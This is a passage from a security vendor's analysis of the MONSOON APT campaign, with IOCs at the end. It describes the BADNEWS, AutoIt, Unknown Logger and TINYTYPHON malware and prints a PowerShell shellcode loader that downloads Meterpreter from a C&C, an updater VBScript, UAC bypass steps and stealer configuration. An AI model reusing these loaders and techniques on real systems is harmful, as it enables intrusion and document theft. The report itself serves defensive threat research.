MmVhZGFkMmQ2NGM2YzY4NWU2NjU4NWE1ZTYwNDI0ZTZlNTI0YzY4ZWFkNmMyZGVlNGZjZGM2Y2YwZmFkOGZlNjJkMmUyZDIz== [1] Original: MmVhZGFkMmQ2NGM2YzY4NWU2NjU4NWE1ZTYwNDI0ZTZlNTI0YzY4ZWFkNmMyZGVlNGZjZGM2Y2YwZmFkOGZlNjJkMmUyZDIz== [2] Base64 dec: 2eadad2d64c6c685e66585a5e60424e6e524c68ead6c2dee4fcdc6cf0fad8fe62d2e2d23 [3] Decrypted: http://5.254.98.68/mtzpncw/gate.php #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 27/57 ``` ----- ### Forcepoint™ Security Labs™ | Special Investigations **Command Set. After BADNEWS sends off the system information of the machine it will receive back a** command. Most commands are in the format of ":" where "" is a plaintext command tag and "" is a parameter for the command encrypted with the algorithm previously described. Listed below are supported command tags and their descriptions: CMD Description shell Download an EXE and inject it into a new process using process hollowing link Download an EXE and execute it via CreateProcess API mod Download a DLL from the URL specified and load it into the current process upd Download a new version of the malware and delete the old one via VBScript (see below) dwd Create an empty file in the %temp% folder and send to C&C - possibly used for identifying the local system time kl Send keylog file to C&C (keylogging is always on) snp Take a screenshot and send it to the C&C ustr Exfiltrate documents found on the machine - the malware asynchronously crawls local harddrives for documents (pdf, doc etc.) sdwl Upload specified file from victim machine utop Disable document exfiltration hcmd Execute command via cmd.exe and send the output to C&C {{ Use new C&C server address specified between {{ and }} in the content (i.e. _{{MmVhZGFkMmQ2NGM2YzZjZGNkY2RlNjZmYWUwZjJlZTY0ZmNlOGVjNjZmYWUwZ_ _jJlZTY4ZjJjOGYyMw==}})_ ok Do nothing Figure 24 – BADNEWS Command Set The malware will send back an acknowledgment response for most of these commands along with any additional data from the command that has been executed. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 28/57 |CMD Description|Col2| |---|---| |shell|Download an EXE and inject it into a new process using process hollowing| |link|Download an EXE and execute it via CreateProcess API| |mod|Download a DLL from the URL specified and load it into the current process| |upd|Download a new version of the malware and delete the old one via VBScript (see below)| |dwd|Create an empty file in the %temp% folder and send to C&C - possibly used for identifying the local system time| |kl|Send keylog file to C&C (keylogging is always on)| |snp|Take a screenshot and send it to the C&C| |ustr|Exfiltrate documents found on the machine - the malware asynchronously crawls local hard- drives for documents (pdf, doc etc.)| |sdwl|Upload specified file from victim machine| |utop|Disable document exfiltration| |hcmd|Execute command via cmd.exe and send the output to C&C| |{{|Use new C&C server address specified between {{ and }} in the content (i.e. {{MmVhZGFkMmQ2NGM2YzZjZGNkY2RlNjZmYWUwZjJlZTY0ZmNlOGVjNjZmYWUwZ jJlZTY4ZjJjOGYyMw==}})| |ok|Do nothing| ----- ### Forcepoint™ Security Labs™ | Special Investigations **Keylogger. When BADNEWS first starts it will spawn a new thread to log keystrokes to a file. The header** of the file contains the marker "KLTNM:" and the system language. The rest of the file contains information about the active window and the keys pressed: ``` KLTNM: 崐ခခ00000409 2016/06/01 09:42:18 - {Window Name} [SHIFT]c[SHIFT]; ``` The malware will only send the keylog file to the C&C when instructed to by the "kl" command. **Document Crawler. When BADNEWS first starts it will spawn a new thread to check all local & mapped** drives for document files with the following extensions: - doc - docx - pdf - ppt - pptx - txt Any documents under 15MB will be copied to the user's _%temp%\SMB\ folder. The malware will only send_ these documents to the C&C when instructed to by the "ustr" command. **Window Message Processor. BADNEWS will also check for any new hard-drives that are added to the** machine such as USB devices. It does this in an interesting way by creating a window and listening for the WM_DEVICECHANGE window message: ``` LRESULT CALLBACK WndProc(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) { // Window message 23 is defined by the malware as a code to disable the document crawler if ( Msg > WM_QUERYENDSESSION ) { if ( Msg == WM_ENDSESSION ) return 23; // Has a new device been added to the machine? If so, try to find documents if ( Msg == WM_DEVICECHANGE ) CrawlDrivesForDocuments(); } else { switch ( Msg ) { case WM_QUERYENDSESSION: return 23; case WM_CREATE: return 0; case WM_DESTROY: return 23; } } return DefWindowProcW(hWnd, Msg, wParam, lParam); } ``` Figure 25 - Device Change Listener #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 29/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Updater VBScript. The "upd" command downloads a new version of the malware to %temp%\up.exe** and then updates the malware (jli.dll) via the following VBScript: ``` Set oShell = CreateObject ("WScript.Shell") Dim strArgs,dest,file,demofile,filesys,appdata,wshSystemEnv dest="MicroScMgmt.exe " dest1="jli.dll" WScript.sleep 8000 strArgs = "cmd /c move /Y %temp%\up.exe ""%appdata%""\Microsoft\"+dest1 oShell.Run strArgs, 0, true Set filesys = CreateObject ("Scripting.FileSystemObject") wshSystemEnv = oShell.ExpandEnvironmentStrings( "%APPDATA%" ) appdata = wshSystemEnv & "\ss.vbs" set demofile = filesys.GetFile(appdata) demofile.Delete strArgs= "cmd /c """+ wshSystemEnv +"\Microsoft\"+dest+"""" oShell.Run strArgs, 0, false ``` Figure 26 – Updater VBScript #### AUTOIT BACKDOOR The majority of the weaponised documents used in MONSOON are PPS files which exploit CVE-20146352 and drop an AutoIt binary. The AutoIt script contained within the binary contains a host of features including: - Sending off system information - Executing arbitrary commands - Updating itself - Escalating privileges (bypassing UAC [7]) - Exfiltrating documents found on the system - Executing secondary PowerShell-based malware - Executing second stage "custom" malware - Stealing Chrome passwords - Identifying whether 360 Total Security anti-virus is running #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 30/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Decompiled AutoIt Script. A fully decompiled version of this AutoIt backdoor was generated by the** Special Investigations Team in Forcepoint Security Labs™. **Document Exfiltration. The AutoIt backdoor is capable of finding and uploading documents with the** following extensions: ``` *.doc;*.pdf;*.csv;*.ppt;*.docx;*.pst;*.xls;*.xlsx;*.pptx;*.jpeg ``` These will then be uploaded to /update-request.php on the C&C. Figure 27 – Upload via PHP Script **Privilege Escalation. The backdoor will attempt to escalate privileges by bypassing Windows User** Account Control (UAC) using one of two well-known techniques[13]: If the user's operating system is 64-bit then the malware will use the Windows Update Standalone Installer (WUSA) to copy its DLL into a protected folder (C:\Windows\System32\oobe) with the name _wdscore.dll. It will then execute oobe.exe which will side-load the malicious wdscore.dll instead of the_ one from the system directory. If the user is on a 32-bit system then the malware will use the CallWindowProcW API to jump into some shellcode that will inject the UAC bypass executable into Svchost.exe. Firstly, the legitimate Windows "Computer Management.lnk" file is overwritten with a new version using Leo Davidson's IFileOperation[14] code. This links to the original malware executable. Secondly, the malware will execute _CompMgmtLauncher.exe which in turn will execute the copied shortcut as an elevated process._ 13 https://www.pretentiousname.com/misc/win7_uac_whitelist2.html 14 https://msdn.microsoft.com/en-us/library/bb775771(VS.85).aspx #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 31/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **PowerShell Second Stage & Metasploit Meterpreter. The AutoIt backdoor will send heartbeats to its** C&C at /dropper.php and receive back commands. During our analysis, we saw that the C&C _212[.]129[.]13[.]110 was serving a base64 encoded response to the heartbeat requests:_ Figure 28 – Base64 Response This response contains the command ID and the parameter. In this case the command ID is 2 which tells the AutoIt backdoor to execute the base64 encoded blob under PowerShell. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 32/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations The PowerShell script eventually decodes to a typical shellcode loader, which has been cleaned up and beautified: ``` $c = '' [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count); $w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; [Byte[]] $sc = 0xfc,0xe8,0x86,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0 x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31...**snip**... $size = 0x1000; if ($sc.Length -gt 0x1000){ $size = $sc.Length }; $x=$w::VirtualAlloc(0,0x1000,$size,0x40); for ($i=0;$i -le ($sc.Length-1);$i++) { $w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) }; $w::CreateThread(0,0,$x,0,0,0); for (;;){ Start-sleep 60 }; ``` Figure 29 – Beautified Powershell The shellcode will dynamically resolve APIs and attempt to download a malware component from _hxxps://45[.]43[.]192[.]172:8443/OxGN._ #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 33/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations Figure 30 – Hard Coded IP Address #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 34/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations The payload received from this was yet more shellcode and what appeared to be encrypted binary data. This secondary shellcode changed each time requested it from the C&C because it was being dynamically built with a different encryption (XOR) key: Figure 31 – Encrypted Shellcode #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 35/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations Once decrypted, the data appears to be a PE file but contains code within the header. Figure 32 – Decrypted PE File It finally calls code to manually load and relocate the decrypted executable into a new region of memory, and then jump into the original entry point. It turned out that the decrypted executable here was actually Metasploit's Meterpreter, which spawned a reverse TCP shell back to the C&C at _hxxps://45[.]43[.]192[.]172:8443. During our analysis the following commands from the Meterpreter_ server were received: - stdapi_sys_config_getuid - stdapi_sys_config_sysinfo - stdapi_net_config_get_interfaces - stdapi_net_config_get_routes #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 36/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations No further commands were receive any after this. #### UNKNOWN LOGGER PUBLIC V 1.5 Unknown Logger is another malware component used in MONSOON. It is a publicly released, free backdoor. It is capable of credential theft from browsers, keylogging, taking screenshots, spreading itself laterally, and downloading second stage malware. In 2012, a user named "The _Unknown"_ publicly released a free version of a credential stealing worm on _hackforums[.net] called_ _"Unknown Logger Public"._ The actors have been using version 1.5 of this malware in some of their weaponised documents. It is likely that they simply downloaded and built their own version from the publicly available version 1.5 on Hackforums. Figure 33 – Unknown Logger Server Configuration Panel Unknown Logger is dropped by at least two[15] of the weaponised documents analysed. Both of these documents exploit CVE-2014-6352. 15 SHA1: 824013c9d8b2aab1396c4a50579f8bd4bf80abdb SHA1: e27d3cfc9141f618c5a8c075e7d18af11a012710 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 37/57 Figure 33 – Unknown Logger Server Configuration Panel ----- ### Forcepoint™ Security Labs™ | Special Investigations Figure 34 – Unknown Logger – Settings Panel #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 38/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations Unknown Logger's main purpose is to record keystrokes and steal usernames and passwords saved by browsers on the local machine. This information is then sent to a pre-defined FTP or SMTP server with a username and password specified by the actor when building the malware. It can also spread itself into RAR files, USB devices and network shares. Interestingly it does not have the ability for C&C communication. It cannot execute arbitrary commands or receive a command indicating what it should do next. ``` Features: 1- Built in Stub 2- Get Tons of Information about the slave (Computer User, Computer Name, Computer Total Physical Memory, slave's IP Address, slave's Country, Date, etc...) 3- Send logs to SMTP Severs and FTP 4- SMTP (Hotmail, Gmail, AOL, Yahoo) 5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo) 6- Test FTP Functionality 7- Continuously Send Logs without Fail 8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you) 9- Logs Every Single Thing on the Keyboard (Letters(Up Cases and Low Cases) - Numbers Symbols - Specific Keys ([F1], [F2], [Home], etc...)) 10- Works on all Operating Systems (Window XP, Window Vista, Window 7 (32 and 64 bit) 11- Hide Functionality (Make the Server Invisible to the Naked eye) 12- Never Crashes in slave's Computer (Will always be working whatever happens) 13- Simple and Easy to use GUI 14- Customer Server Name 15- Sends Clean and Very Organized Logs 16- Can be Used as a Keylogger - Stealer - Worm Spreader and more by just Checking Few Boxes Spreaders: 1- USB Spreader 2- LAN Spreader 3- P2P Spreader 4- RAR Spreader Stealers: 1- Firefox 4/5/6/7/8/9 2- Google Chrome All Versions 3- Opera All Versions 4- Internet Explorer 7/9 ``` ``` 5- Steam Stealer 6- CD Keys (up to 300) Anti Killers: 1- Anti Nod32 (All Versions) 2- Anti Kaspersky (All Versions) 3- Anti BitDefender (All Versions) 4- Anti MalwareBytes (All Versions) 5- Anti Norman (All Versions) 6- Anti WireShark (All Versions) 7- Anti Anubis (All Versions) 8- Anti KeyScrambler (All Versions) 9- Anti Ollydbg (All Versions) 10- Anti Outpost (All Versions) 11- Anti ZoneAlaram (All Versions) Disablers: 1- Disable RUN 2- Disable Registry 3- Disable CMD 4- Disable Right Click 5- Disable Task Manager 6- Disable System Restore Deleters: 1- Delete FireFox Cookies 2- Delete Google Chrome Cookies 3- Delete Internet Explorer Cookies Download And Execute: Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously Webpage Loader: Add any Link and it will be Automatically Loaded on the slave's PC ``` #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 39/57 ----- ### Forcepoint™ Security Labs™ | Special Investigations **Configuration. In the samples analysed[16],** Setting Value Unknown Logger was configured to download DeleteFirefoxSignons False the AutoIt backdoor upon start-up. One of configurations was as follows: RunRegistryKey False Setting Value Screenshots True Username chinastratforum@gma ScreenshotIntervalMinutes 1 il.com FakeAlert False Password ****redacted**** FakeAlertText SmtpServer smtp.gmail.com AlertType FTPServer ftp://www.example.co m/example.txt AntiKeyScrambler True SmtpPort 587 AntiWireshark True UseSmtp True AntiAnubis True UseFTP False AntiMalwarebytes True ExfilIntervalMinutes 1 AntiKaspersky True ScreenshotEmailRecipient c**redacted**@gmail. AntiOllydbg True com AntiOutpost True USBSpreader True AntiNorman True CreateNetworkShare True AntiBitdefender True RARSpreader True AntiNOD32 True P2PSpreader True AntiZoneAlarm True FirefoxStealer True Keylogger True OperaStealer False NoRun False ChromeStealer True NoRegedit False IEStealer False NoCMD False SteamStealer False NoViewContextMenu False CDKeysStealer False NoTaskMgr False DeleteCookies False NoSystemRestore False DeleteChromeCookies False LaunchProcess False 16 SHA1: c691c07191963ca3db28235d0a38060b2b9ea8f2 SHA1: 6e85333e5ee05c40bee0457419aa68a007a0e5f5 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 40/57 |Setting Value|Col2| |---|---| |Username|chinastratforum@gma il.com| |Password|**redacted**| |SmtpServer|smtp.gmail.com| |FTPServer|ftp://www.example.co m/example.txt| |SmtpPort|587| |UseSmtp|True| |UseFTP|False| |ExfilIntervalMinutes|1| |ScreenshotEmailRecipient|c**redacted**@gmail. com| |USBSpreader|True| |CreateNetworkShare|True| |RARSpreader|True| |P2PSpreader|True| |FirefoxStealer|True| |OperaStealer|False| |ChromeStealer|True| |IEStealer|False| |SteamStealer|False| |CDKeysStealer|False| |DeleteCookies|False| |DeleteChromeCookies|False| |Setting Value|Col2| |---|---| |DeleteFirefoxSignons|False| |RunRegistryKey|False| |Screenshots|True| |ScreenshotIntervalMinutes|1| |FakeAlert|False| |FakeAlertText|| |AlertType|| |AntiKeyScrambler|True| |AntiWireshark|True| |AntiAnubis|True| |AntiMalwarebytes|True| |AntiKaspersky|True| |AntiOllydbg|True| |AntiOutpost|True| |AntiNorman|True| |AntiBitdefender|True| |AntiNOD32|True| |AntiZoneAlarm|True| |Keylogger|True| |NoRun|False| |NoRegedit|False| |NoCMD|False| |NoViewContextMenu|False| |NoTaskMgr|False| |NoSystemRestore|False| |LaunchProcess|False| ----- ### Forcepoint™ Security Labs™ | Special Investigations Setting Value Setting Value LaunchProcessString http:// DownloadExecFileURL http://newsnstat.com/ nregsrv2.exe DownloadExecFile True Melt False Figure 35 – Unknown Logger Configuration The settings have been named as part of the investigation as they are not specifically named in the malware. The "DownloadExecFileURL" specifies a URL to grab an additional file from and execute it at runtime. Analysis found that nregsrv2.exe is the same AutoIt trojan dropped by many of the other weaponised documents used in this campaign. #### TINYTYPHON The TINYTYPHON malware is a small backdoor capable of finding and uploading documents on locally mapped drives and receiving secondary malware. It is dropped by at least one of the weaponised documents[17] used in the MONSOON campaign where it is embedded inside another executable. The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents. **Configuration & Persistence. TINYTYPHON contains a small configuration appended to the end** of the executable. In the sample analysed[18] this configuration was XORed with the hexadecimal value 0x90. |Setting Value|Col2| |---|---| |LaunchProcessString|http://| |DownloadExecFile|True| |Setting Value|Col2| |---|---| |DownloadExecFileURL|http://newsnstat.com/ nregsrv2.exe| |Melt|False| 17 SHA1: 9cdbb41f83854ea4827c83ad9809ed0210566fbc 18 SHA1: fcf8e5cf1207fdfab9bcb0a4dc45ad188089655a #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1.07 | TLP-WHITE | 41/57 ----- Figure 36 – XOR 0x90 Data The configuration contains the C&C address and paths to use as well as a list of document extensions to check when crawling local drives. It also contains the filename to copy itself to in the local system32 directory, and the name of the persistence registry key to install itself under _HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run._ **Document Crawler. TINYTYPHON constantly searches for and uploads documents on the local** machine. It will first search for any documents on the drive containing the operating system, and then it will search through all drive letters C through to Z. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 42/57 ----- Figure 37 – Document Crawler #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 43/57 ----- Once a document is found matching one of the extensions in the configuration, the document is uploaded to the C&C. Figure 38 – Document Upload to C&C **Victims. The TINYTYPHON C&C from the sample we analysed contained a /http directory which** had an open directory listing: Figure 39 – C&C Web Server /http listing #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 44/57 ----- The /upload directory contained several folders relating to different victims: Figure 40 – C&C Web Server /http/upload listing #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 45/57 ----- Each of these folders contained the documents found and uploaded by TINYTYPHON on the victim's machine. Figure 41 – C&C Web Server /http/upload/ listing The filenames begin with the MD5 hash of the file, then a dash, and then the original filename. There were thousands of documents which had been exfiltrated to this C&C. After reviewing the filenames of documents from several of the victims, it appears as though most of the victims are involved with government agencies. Some of these documents contain highly sensitive information such as clearance documents, financial information, and technical specifications. During the investigation, the server stopped responding on June 8, 2016 and then came back online on July 5, 2016. It is unknown why this month long outage occurred, although it could have been because the group knew that people were accessing the open directories and wanted to remain undetected. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 46/57 ----- ## ATTRIBUTION With respect to attribution, Forcepoint Security Labs focus on enabling the awareness and understanding of intent. This is useful in order to identify likely future behaviour. Reports from Special Investigations do not focus on specific attribution. #### VICTIMS The MONSOON victims fit with a group who have military and political interests in the Indian Subcontinent. Many of the victims are located in surrounding countries including Bangladesh, Sri Lanka and Pakistan. But victims also originate from further afield, including Africa and the Far East. The targeting of Chinese nationals may also be related to this campaign, but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group [2]. #### ADVERSARIES It was possible to identify an individual from a domain registration record who is believed to be associated with MONSOON. There is a highly probable level of confidence in this association due to the following reasons: - The domain name registered is a variant of one of the most popular domains used in MONSOON - The person who registered the domain lives or has lived and works in India - The person who registered the domain has profiles on coding challenge and freelance coder websites. The HANGOVER group are thought to use freelance coders. From the information available, it was possible to identify this individual’s Facebook and LinkedIn accounts. However, it is not deemed in the public interest to publish specific details on this individual. Relevant authorities are informed as and when appropriate. **Cui Bono? A useful analysis viewpoint is to ask the legal question: Cui Bono? Or: “who profits?”** Even though this report does not attempt to focus on specific attribution, asking “What is to be _gained from these actions or what needs are satisfied?” may offers some insight. Any further_ analysis is left as an exercise to for reader. From the documents known to have been exfiltrated, a number of recurring themes occur: - Army training, personnel and payroll records - Defence attaches and consulates - Defence research - Foreign high commissions - Military exercises - Military air platforms - Military naval platforms - Military logistic records - Naval coastal protection - Anti-torpedo and naval electronic countermeasure (ECM) systems. - Submarine communication systems - Nuclear security and counter proliferation - United Nations - Personal details including medical records, driving license, passport and visas - Accounting records - Travel and itinerary details #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 47/57 ----- #### INFRASTRUCTURE By integrating the findings with prior research [1] [8], it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections. The original HANGOVER infrastructure overlaps with unique passive DNS records and is further linked by the use of a specific SOA RNAME record. An example of this connection is illustrated below. Figure 42 – Connection Topology Both of the IPs that link this infrastructure appear to be unique to the Hangover group. The _newsnstat[.com]_ domain was used earlier in 2015 for previous HANGOVER campaigns, and was then repurposed in December 2015 for the MONSOON campaign. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 48/57 ----- ## INDICATORS OF COMPROMISE A list of IOCs for MONSOON can be found below. This not a comprehensive list and is focused on the specific documents and malware that were analysed for the purpose of this report. #### LURE URLS ``` hxxp://t.ymlp50.com/bjyapaejesjaoawsqaaaujwes/click.php hxxp://www.newsnstat.com hxxp://www.cnmilit.com hxxp://www.militaryworkerscn.com hxxp://milresearchcn.com hxxp://miltechweb.com hxxp://milscience-cn.com hxxp://miltechcn.com hxxp://nudtcn.com hxxp://modgovcn.com hxxp://climaxcn.com hxxp://chinastrats.com hxxp://chinastrat.com hxxp://epg-cn.com hxxp://extremebolt.com hxxp://socialfreakzz.com hxxp://info81.com hxxp://www.81-cn.net hxxp://lujunxinxi.com hxxp://letsgetclose.com hxxp://greatdexter.com WEAPONISED DOCUMENT HASHES (SHA1) 9034c8bfac8385a29f979b1601896c6edb0113b2 (Cyber_Crime_bill.doc) 11064dcef86ac1d94c170b24215854efb8aad542 (Cyber_Crime_bill.doc) 5de78801847fe63ce66cf23f3ff3d25a28e2c6fe (China_Vietnam_Military_Clash.doc) 478a41f254bb7b85e8ae5ac53757fc220e3ab91c (Cyber_Crime_bill.doc) 1e39ff194c72c74c893b7fd9f9d0e7205c5da115 (china_report_EN_web_2016_A01.doc) f7d9e0c7714578eb29716c1d2f49ef0defbf112a (Job_offers.doc) 406c74e8eb89fa7b712a535dd38c79c1afd0c6fe (DPP_INDIA_2016.pps) 9cdbb41f83854ea4827c83ad9809ed0210566fbc (DPP_INDIA_2016.doc) 7ee94c8279ee4282041a242985922dedd9b184b4 (maritime_dispute.pps) 1ce0ad3556f5866f309e04084d9a230f9f2ce158 (Clingendael_Report_South_China_Sea.pps) 4a575bfe63262d53a765de254f534e830d03f638 (PLA_Forthcoming_Revolution_in_Doctrinal_Affairs.pps) cfb33642b702bb4da43aa6842aa657f1ec89b1f6 (China_Security_Report_2016.pps) 5d61d614731beeb520f767fcbb5afe151341238a (militarizationofsouthchinasea_1.pps) f3c9c62869c87fe177a69271b9e7f2b5aabcd66c (Chinese_Influence_Faces_2.pps) dcccd7a9886e147ecf01718047e1f911323ca8c9 (2016_China_Military_PowerReport.pps) c9dddd6d4858234e1be971c7f66193ea907ac8d8 (PLA_UAV_DEPLOYMENT.pps) 11c05a5f6ca2e683dba31d458777c0b6b8d558aa (7GeopoliticalConsequencetoAnticipateinAsiainEarly2016_1.doc) 3eef8e44556e4102a71ea4499d30f57495b9096a (UN__4_21_2015.doc) 4d1ad73a9c61527a8b685006ab60b0a3ffbc51bd (China_plan_to_dominate_South_China_Sea_and_beyond.doc) e6acbb5f653c5dc8eb324e82591587179b700d0c (China_Response_NKorea_Nuclear_Test13.pps) ea3029aef9ab1cda24ccecfbed8f31ec1f28525e (ChinaUS_11.pps) 3f9dc2944269d1160048c5a96e5eec8d14449341 (China_two_child_policy_will_underwhelm11.pps) 971ea3f1d32bb8bd9657c17b2c1520b5fb9c1d0e (MilReforms_1.pps) MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 49/57 ``` ----- ``` e8276f46e335c4f8cd7313da1fd0b7f6ac9d5892 (MilReforms_2.pps) 1c9d01d8562509a7f10e355e6d1d9f3d76cd44cd (CHINA_FEAR_US_3.pps) 48c9f91e6829f2dee0a4a2bf5cb1f26daea6c46a (CHINAS_PUZZLING_DEFENSE_AGREEMENT_WITH_AUSTRALIA_12.pps) 414e7d0d874cfd42bd4a11a317730e64bc06b794 (Obama_Gift_China_11.pps) 74c504886a7166c044f3fe3529745cdcf097a726 (japan_pivot_12.pps) 4d0ed3d1c6a3b4dfe3f5a3a8cf2bb2120b617d18 (TaiwanDiplomaticAccess_11.pps) a4f0494212314c9e8c32dd6cfb16030b13965c2c (australia_fonops_13.pps) e27d3cfc9141f618c5a8c075e7d18af11a012710 (Sino_Pak.pps) 824013c9d8b2aab1396c4a50579f8bd4bf80abdb (prc_nsg.pps) a5cf24751acdf4b9ab307d3fda037c164758704c (Jakobson_US_China_Report.pps) 4d1ad73a9c61527a8b685006ab60b0a3ffbc51bd (Sino_Russia.doc) #### BADNEWS MALWARE HASHES (SHA1) dc7a4def1dd5d62b906d19900b19cad4b2bd299d b362d1d91ed93eebb03d240553153f2148209d3a 3b2af1a6dbec193a647d97c4bfaf21f562c27258 d09ed8c4b5ad43fb4a6d13a96c2cd083b8795692 ce7b2336e94900ffad5339769219ab997d55e4a5 b657dedfad9039fdd6a5cdb84a6031e7e457dc91 7dcd87e79d08708e540f9f4bda5692a582c67eed AUTOIT MALWARE HASHES (SHA1) 32a89a8c1bc77a300a949091199a082acc165f40 1c0a47613f36c723f6a0b62f9d085a646c3dd69d af3f8f686b63bc209ef52ef35c7daad268d57921 3109a3307bb06f815bb48cae39d6a940e1f1113b 4d287bb8a93ef633a934a85172f1f0da1400abd5 be7fe8585789a6d584e6c3ebc77b506a02cadb54 2cb158449a9c56511dfda518afb76686f3ccadfa 282af7d58d4cc71e3430ac1af01d86e07c70891c 6356ed00198eda3a2997ee4017cf545c42f77ce2 df3016b793b14c8a9b032a82d46fa67ce12b91c3 f16cd0a84c02c9f0697c0d2d28ad199e5763f96f 734d4272748aa3c6ae45abd39a406a6f441b1f4a 386390afde44f7c14917591c89a76e007315fc8b TINYTYPHON MALWARE HASHES (SHA1) 411387df2145039fc601bf38192b721388cc5141 fcf8e5cf1207fdfab9bcb0a4dc45ad188089655a 791eae42d844a3a684271b56601346a26f3d4a33 UNKNOWN LOGGER MALWARE HASHES (SHA1) c691c07191963ca3db28235d0a38060b2b9ea8f2 6e85333e5ee05c40bee0457419aa68a007a0e5f5 MISCELLANEOUS SAMPLES (SHA1) 4c70974aa8ce3de87d1c2a42d418d8c1b25904a4 (.NET updater used by AutoIt backdoors) 99f07fb2aaa637291476fde6cfd4921c835959d0 (UAC bypass stub) BADNEWS C&C hxxp://43.249.37.173/quantum/ghsnls.php hxxp://5.254.98.68/Tussmal/ghsnls.php hxxp://85.25.79.230/quantum/ghsnls.php hxxp://85.25.79.230/quantum/ghsnls.php hxxp://captain.chickenkiller.com/quantum/ghsnls.php hxxp://feeds.rapidfeeds.com/61594/ hxxp://feeds.rapidfeeds.com/81908/ MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 50/57 ``` ----- ``` hxxp://feeds.rapidfeeds.com/81909/ hxxp://raheel.ignorelist.com/quantum/ghsnls.php hxxp://rasheed.crabdance.com/quantum/ghsnls.php hxxp://raw.githubusercontent.com/azeemkhan89/sports/master/sports.xml hxxp://updatesoft.zapto.org/Tussmal/ghsnls.php hxxp://updatesys.zapto.org/Tussmal/ghsnls.php hxxp://ussainbolt.mooo.com/Tussmal/ghsnls.php hxxp://ussainbolt1.mooo.com/Tussmal/ghsnls.php hxxp://www.chinahush.com/2014/12/27/can-common-views-of-chinese-women-be-changed hxxp://www.chinasmack.com/2016/digest/woman-discards-her-food-on-shanghaimetro.html hxxp://www.repeatserver.com/Users/sports/news.xml hxxp://www.webrss.com/createfeed.php?feedid=47444 hxxp://194.63.142.174/Mussmal/ghsnls.php hxxp://43.249.37.173/yumhong/ghsnls.php hxxp://85.25.79.230/tesla/ghsnls.php hxxp://asatar.ignorelist.com/tesla/ghsnls.php hxxp://blog.chinadaily.com.cn/home.php?mod=space&uid=2392255&do=blog&id=35101 hxxp://feeds.rapidfeeds.com/81913/ hxxp://forum.china.org.cn/viewthread.php?tid=175850&page=1&extra hxxp://hostmyrss.com/feed/housing_news hxxp://javedtar.chickenkiller.com/tesla/ghsnls.php hxxp://overthemontains.weebly.com/trekking-lovers hxxp://russell01.servebeer.com/ hxxp://russell02.servehttp.com/ hxxp://russell02.servehttp.com/ hxxp://russell03.servehttp.com/ hxxp://tariqj.crabdance.com/tesla/ghsnls.php hxxp://wgeastchina.steelhome.cn/xml.xml hxxp://whgt.steelhome.cn/xml.xml hxxp://www.chinasmack.com/2016/digest/chinese-tourist-bit-by-snake-inthailand.html hxxp://www.itpub.net/thread-2055123-1-1.html 